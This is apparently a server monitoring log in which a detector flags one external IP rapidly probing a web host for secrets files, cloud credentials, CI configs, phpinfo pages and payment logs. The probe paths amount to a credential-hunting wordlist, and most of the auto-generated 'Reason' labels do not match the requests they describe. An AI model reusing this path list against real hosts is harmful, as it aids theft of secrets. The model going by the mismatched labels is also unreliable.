Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126952 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.851553136Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /admin/config HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.126995 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.858248731Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /admin/settings HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127023 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.881148930Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /credentials.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127049 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.900558410Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /credentials.txt HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127076 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.909817370Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /secrets.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127103 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.912270519Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /secrets.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127130 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:04.956699401Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /api/config.map HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127177 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.965436087Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /secrets.yaml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127215 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:04.967519537Z 185.177.72.60 - - [20/Mar/2026:15:16:04 +0000] "captain.admin.kovicloud.com" "GET /.vscode/sftp.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127257 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.023336566Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /docker-compose.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127285 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.128828355Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /appsettings.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127312 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.139502852Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/secrets.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127339 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.145280798Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/settings.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127375 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.153256820Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/credentials.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127410 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.193996712Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/config.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127437 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.258664859Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /webhooks/settings.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127526 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.271045985Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /instance/config.py HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127557 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.308824271Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /swagger.json HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127601 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.349900014Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /app/config/parameters.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x6...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127627 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.372872968Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/parameters.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) A...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127653 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.392481873Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /parameters.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127680 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.399240076Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/application.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127709 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.410064233Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /application.properties HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127735 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.448800911Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /application.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127771 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.450663961Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /settings.py HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127810 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.533461473Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127837 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.594903826Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config.inc HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127875 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:05.625067005Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /api/settings.map HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127910 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.626102417Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /config/database.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) App...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127939 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.637764380Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /backend/config/default.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127966 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.641373422Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /backend/config/settings.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; ...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.127992 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.682664820Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /serverless.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128029 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.730884228Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /.aws/credentials HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128196 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.734053168Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /.aws/config HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128230 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.739053470Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /aws/credentials HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.785241104Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /aws-secret.yaml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128282 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.786197360Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /.circleci/config.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Ap...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128310 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.792476977Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /.travis.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128337 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.799344535Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /.bitbucket/pipelines.yml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128363 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.809090559Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /info.php HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128391 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.869947846Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /test.php HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128418 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.903613524Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /phpinfo HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128445 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.904624801Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /phpinfo.php HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128475 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Request to /api/.env is a common sensitive file exposure attempt; HTTP 200 suggests potential misconfiguration or exposure Line=2026-03-20T15:16:05.916916839Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /api/v1/config.map HTTP/1.1" 200 83 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128504 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.955702866Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /_profiler/phpinfo HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128550 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.976777826Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128578 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.989392856Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /horizon/api/stats HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128607 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:05.991261379Z 185.177.72.60 - - [20/Mar/2026:15:16:05 +0000] "captain.admin.kovicloud.com" "GET /_profiler/latest HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128633 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.012260030Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /manage/env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128659 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.061969379Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /debug/default/view HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128685 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.104753160Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /error.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128715 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.108667002Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /server-info HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128740 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.110517611Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /debug.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128770 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.115081223Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /storage/logs/laravel.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128800 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.150087883Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /storage/logs/stripe.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Mar 20 15:16:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:17.128828 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:16:06.160934996Z 185.177.72.60 - - [20/Mar/2026:15:16:06 +0000] "captain.admin.kovicloud.com" "GET /storage/logs/payments.log HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x6...
Mar 20 15:16:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:19.958048 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:16:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:19.958084 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
